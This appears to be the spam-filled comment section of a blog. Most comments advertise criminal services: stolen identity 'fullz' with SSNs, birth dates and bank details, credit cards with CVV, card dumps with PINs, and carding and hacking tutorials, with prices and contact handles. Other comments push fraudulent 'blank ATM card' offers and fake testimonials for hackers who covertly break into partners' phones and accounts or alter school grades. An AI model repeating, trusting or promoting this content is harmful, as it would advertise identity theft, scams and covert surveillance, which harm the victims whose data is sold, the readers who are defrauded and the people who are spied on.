->REALTIONSHIP DETAILS
->MORTGAGE INFO
->BANK ACCOUNT DETAILS
>All Leads are Spammed & Verified.
>Fresh spammed data of USA Credit Bureau
>Good credit Scores, 700 minimum scores
>Bulk order will be preferable
>Invalid info found, will be replaced.
>Payment mode BTC, ETH, LTC, PayPal, USDT & PERFECT MONEY
''OTHER GADGETS PROVIDING''
>SSN+DOB Fullz
>CC with CVV
>Photo ID's
>Dead Fullz
>Carding Tutorials
>Hacking Tutorials
>SMTP Linux Root
>DUMPS with pins track 1 and 2
>Sock Tools
>Server I.P's
>HQ Emails with passwords
**Contact 24/7**
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
Haven't you heard about Mr Calvin's blank ATM card and how other people have benefited from it? I'm Mr Randy Rodriguez. I want to share a blog and forums on how to get a real blank ATM card, i thank Mr Calvin who helped me with an already hacked ATM CARD and I was so poor without funds that I got frustrated. One morning while I was going through some stuff on the internet, I came across different comments of people testifying on how Mr Calvin has helped them from being poor to being rich through this already hacked ATM CARD. I was skeptical if this was true, I decided to contact him to know if he is real. He proved to me beyond all doubts that it was real. So I urgently ordered for my own blank ATM card by Contacting his email and today I'm also testifying about the good work of Mr Calvin. I never believed in it until the card was sent to me, which I am using today Contact the company now and become extremely rich too. Email: officialblankatmservice@gmail.com or WhatsApp +447937001817
ReplyDelete****Contact Me****
ReplyDelete*ICQ :748957107
*Gmail :taimoorh944@gmail.com
*Telegram :@James307
(Selling SSN Fullz/Pros)
*High quality and connectivity
*If you have any trust issue before any deal you may get few to test
*Every leads are well checked and available 24 hours
*Fully cooperate with clients
*Any invalid info found will be replaced
*Credit score above 700 every fullz
*Payment Method
(BTC&Paypal)
*Fullz available according to demand too i.e (format,specific state,specific zip code & specifc name etc..)
*Format of Fullz/leads/profiles
°First & last Name
°SSN
°DOB
°(DRIVING LICENSE NUMBER)
°ADDRESS
(ZIP CODE,STATE,CITY)
°PHONE NUMBER
°EMAIL ADDRESS
°Relative Details
°Employment status
°Previous Address
°Income Details
°Husband/Wife info
°Mortgage Info
$2 for each fullz/lead with DL num
$1 for each SSN+DOB
$5 for each with Premium info
(Price can be negotiable if order in bulk)
OTHER SERVICES ProvIDING
*(Dead Fullz)
*(Email leads with Password)
*(Dumps track 1 & 2 with pin and without pin)
*Hacking Tutorials
*Smtp Linux
*Safe Sock
*Let's come for a long term Business
****Contact Me****
*ICQ :748957107
*Gmail :taimoorh944@gmail.com
*Telegram :@James307
This article is so much helpful and gave me some awesome knowledge. thanks for giving this information. We updated all the trending new information related to any topics.
ReplyDeleteTo be more updated about all the news around you, you can check this website
royal enfield classic 350
Don’t keep cowards as friends and also what ever happens in your marriage you should always keep it to your self without disclosing to friends just yesterday I travelled to francs for a business trip I got my wife a sex toy which my friend suggested I buy it to keep her till am back in a month time I left yesterday but I had my plans. I was in contact with my Personal hacker who helps me when it comes to hacking of devices so I hired spyexpert0@gmail.com after hacking into my wife phone I monitored her phone and her movement, a text came into her phone and I saw it was my friend telling my wife that since am not in the country at the moment he can come over to have fun with my wife and behold my wife agreed.. my wife had sex with my own best friend right under my nose thinking I would never find out but I have always been smarter than her thank you to my very own hacker spyexpert0@gmail.com
ReplyDeleteI noticed a lot of changes on my spouse, so much attitude unnecessary anger and many more which he has never showed to me before though it all started 2 months ago I keep asking where and where did I go Wrong but I could not pick were I went wrong not until I used the russiancyberhackers@gmail.com services to hack into my spouse phone after the whole job was done I was able to read a lot from my spouse phone and from all I gathered my spouse has someone he regards to well more than me.. my husband is cheating on me I never believed what I saw on his phone but all thanks to russiancyberhackers@gmail.com.
ReplyDeleteNever fall for scammers, I had several encounters with them and they end up not doing anything for me.. all I needed is just a phone hack nothing else well my happiness today is spyexpert0@gmail.com this hacker corrected so many things and was able to help me gain access to the phone have been longing to hack into spyexpert0@gmail.com am forever happy Thank you.
ReplyDeleteThis days my wife values her job more than I and the kids it was becoming so so suspicious that I could not hold it any longer I has to seek solutions from jeajamhacker@gmail.com after a quick hack on her cell phone I discovered my suspicions about my wife were all right.. my wife has been cheating on me for a while now and I never took note not until I came in contact with jeajamhacker@gmail.com and I knew the truth
ReplyDeleteLol what an abomination God!!! I caught my husband cheating on me with my mom this is unbelievable, I have been suspecting my husband for a while now and the only way to get the truth was by breaking into his phone remotely so I hired russiancyberhackers@gmail.com behold I saw a lot that has been happening at my back for over 6 months now my husband and my mom has been having secret affairs with each other right under my nose all thanks to you russiancyberhackers@gmail.com
ReplyDeleteI had so much doubt in hackers because of my past experience with 1 or 2 hackers which made me doubt jeajamhacker@gmail.com at first I never wanted to pay but this hacker assured me that his reliable trust me I gave it a try and am really happy I got all I paid for. Do not judge a book by its cover I never believed jeajamhacker@gmail.com could give me the results every other hackers could not give me am so proud to tell the world about the excellent job you did for me. Coming in contact with you is like a dream come true..
ReplyDeleteMy girlfriend blocked me on her Instagram and I felt a lot has been going on, on her account which she doesn’t want me to know about I hired verifiedprohackers@gmail.com to help me break into her account and this hacker gave me the best without me being caught.
ReplyDeleteI caught my wife with the help of jeajamhacker@gmail.com cheating on me via snapchat after I found out that my wife has been a cheater I decided to run a DNA test on our child and I discovered that the child was never mine am heart broken I gave this woman all she needs took care of her I made sure she lacks nothing and yet all I get in returns is this am so grateful to you jeajamhacker@gmail.com if not for you I would have been leaving in the dark taking care of another mans child thank you.
ReplyDeleteNever settle for a cheating partner but incase you ever settled for one and you feel you wanna catch he or she red handed just email darkhatthacker@gmail.com for help in spying on your cheating partner phones without trace and thank me later. Am really glad to see a lot of testimony from people I referred to darkhatthacker@gmail.com for help happy and appreciating darkhatthacker@gmail.com
ReplyDeleteINSTEAD OF GETTING A LOAN,, I GOT SOMETHING NEW
ReplyDeleteGet $10,050 USD every week, for six months!
See how it works
Do you know you can hack into any ATM machine with a hacked ATM card??
Make up you mind before applying, straight deal...
Order for a blank ATM card now and get millions within a week!: contact us
via email address:: besthackersworld58@gmail.com or whats-app +1(323)-723-2568
We have specially programmed ATM cards that can be use to hack ATM
machines, the ATM cards can be used to withdraw at the ATM or swipe, at
stores and POS. We sell this cards to all our customers and interested
buyers worldwide, the card has a daily withdrawal limit of $2,500 on ATM
and up to $50,000 spending limit in stores depending on the kind of card
you order for:: and also if you are in need of any other cyber hack
services, we are here for you anytime any day.
Here is our price lists for the ATM CARDS:
Cards that withdraw $5,500 per day costs $200 USD
Cards that withdraw $10,000 per day costs $850 USD
Cards that withdraw $35,000 per day costs $2,200 USD
Cards that withdraw $50,000 per day costs $5,500 USD
Cards that withdraw $100,000 per day costs $8,500 USD
make up your mind before applying, straight deal!!!
The price include shipping fees and charges, order now: contact us via
email address::besthackersworld58@gmail.com or whats-app +1(323)-723-2568
My husband lied to me and I just found out with the help of jeajamhacker@gmail.com that the woman my husband introduced to me as his cousin was never his cousin but his side chick thank you jeajamhacker@gmail.com for unveiling this to me.
ReplyDelete
ReplyDeleteGET RICH WITH THE USE OF BLANK ATM CARD FROM
(besthackersworld58@gmail.com)
Has anyone here heard about blank ATM card? An ATM card that allows you to withdraw cash from any Atm machine in the world. No name required, no address required and no bank account required. The Atm card is already programmed to dispense cash from any Atm machine worldwide. I heard about this Atm card online but at first i didn't pay attention to it because everything seems too good to be true, but i was convinced & shocked when my friend at my place of work got the card from guarantee Atm card vendor. We both went to the ATM machine center and confirmed it really works, without delay i gave it a go. Ever since then I’ve been withdrawing $1,500 to $5000 daily from the blank ATM card & this card has really changed my life financially. I just bought an expensive car and am planning to get a house. For those interested in making quick money should contact them on: Email address : besthackersworld58@gmail.com or WhatsApp him on +1(323)-723-2568
Get your school grades all fixed with the help of darkhatthacker@gmail.com this hacker is so reliable I recommend you all to email this hacker if you are having issues with your grades and thank me later this hacker has never disappointed me and also people I recommend to him tell him Daphane Ahrens referred you
ReplyDeleteIndeed hackers are real a very big thank you to spyexpert0@gmail.com for the iPhone 13 hack without trace or notifications your job was to smooth and perfect thank you once again.
ReplyDeleteI called my spouse secretary today and she told me my husband left the office already but when I called my husband he lied to me that he was still at the office which made me suspicious about him cheating, he kept on doing this and I had no option than to investigate if he is cheating or not so I hired darkhatthacker@gmail.com for a smooth phone hack to my surprise this hacker gave me all the information I wanted, granted me full access to his phone so I got to monitor his cell phone remotely without being caught all thanks to you darkhatthacker@gmail.com first time using your services all I got was the best thank you once again
ReplyDeleteI got the best mobile phone hacker just today and am happy with all the results coming in directly on my phone remotely without notifications of the target numbers all thanks to the great and reliable hacker verifiedprohackers@gmail.com
ReplyDeleteGod blessings on you darkhatthacker@gmail.com. with you cracking my wife secret gmail account was indeed a successful one without any trace or notifications am forever grateful, this is my first time working with you and I got all SUCCESSFULLY incase y’all need this hacker for same services tell him Jason Sitler Referred you
ReplyDeleteLately My wife has been keeping late nights when I ask her she cooks up stories why she didn’t come home and all I was becoming feed up about her cooked up stories I had to hire a hacker to give me full access to her mobile phone and Also her GPS After this hacker granted me access to all Of this I discovered that my wife has been lying all along to me not knowing she has been cheating on me all thanks to jeajamhacker@gmail.com
ReplyDeleteMy husband ex has been stocking me and yet have been wondering why my husband and his ex broke up, I kept asking my husband questions but yet he wont say a word so I hired a hacker to get me the truth about them, so this hacker hacked both my husband phone and his ex then fished out there deleted messages from the time they broke up with now and I saw so many hidden things my husband never talked to me about all thanks to you russiancyberhackers@gmail.com you are indeed the BEST.
ReplyDeleteMy wife gives me close marking a-lot when I want to hang out with the boys she always decline and all it was becoming to much for me to Handle because I felt controlled so I Hired a hacker to know why my wife suddenly put up all of this, jeajamhacker@gmail.com hacked her iPhone 13 and I was able to access her phone remotely which made me got full access to all applications she uses after spying so hard on her phone I saw that my so called wife is in a relationship with another man and now she’s feeling and getting scared that what ever she has been doing at my back I will be doing same. Have never used a hacker to spy on anyone before, this is my first time using a hacker services and it worked 💯
ReplyDeleteThank you spyexpert0@gmail.com this hacker saved my life because lately have been going through depression cause I feel my wife is cheating though I tried all means to catch her but no way worked for me but when I came in contact with spyexpert0@gmail.com I got all I have been longing to get from my wife phone and I got my fact right about who she really is. She was only a pretender clamming to love and care about me but after my contact with this hacker I realised all the love and care were all lies from the pit of hell.
ReplyDeleteMonths after getting married I caught my wife cheating on me with the help jeajamhacker@gmail.com after a phone was carried out on her phone and I got to monitor all activities carried out on her phone, that was how I was Able to know about my wife cheating on me. God bless jeajamhacker@gmail.com.
ReplyDeletemy search for reliable hackers for months didn’t work out because all hackers I came in contact with could not deliver so I decided to try one more time and I got lucky today after I came in contact with verifiedprohackers@gmail.com this hacker brought me the best results that others could not give. I caught my husband and my niece having an underground relationship together for over a year now and I just found out with the help of verifiedprohackers@gmail.com this was a very clean job without trace and both my husband and my niece don’t know I am monitoring them without physical access to there cell phones. Thank you once again verifiedprohackers@gmail.com for opening my eyes to ungrateful people like my husband and my niece.
ReplyDeleteI was able to monitor my husband Android cell phone activities with the help of spyexpert0@gmail.com and I was never traced, this is like a miracle. Thank you so much spyexpert0@gmail.com
ReplyDelete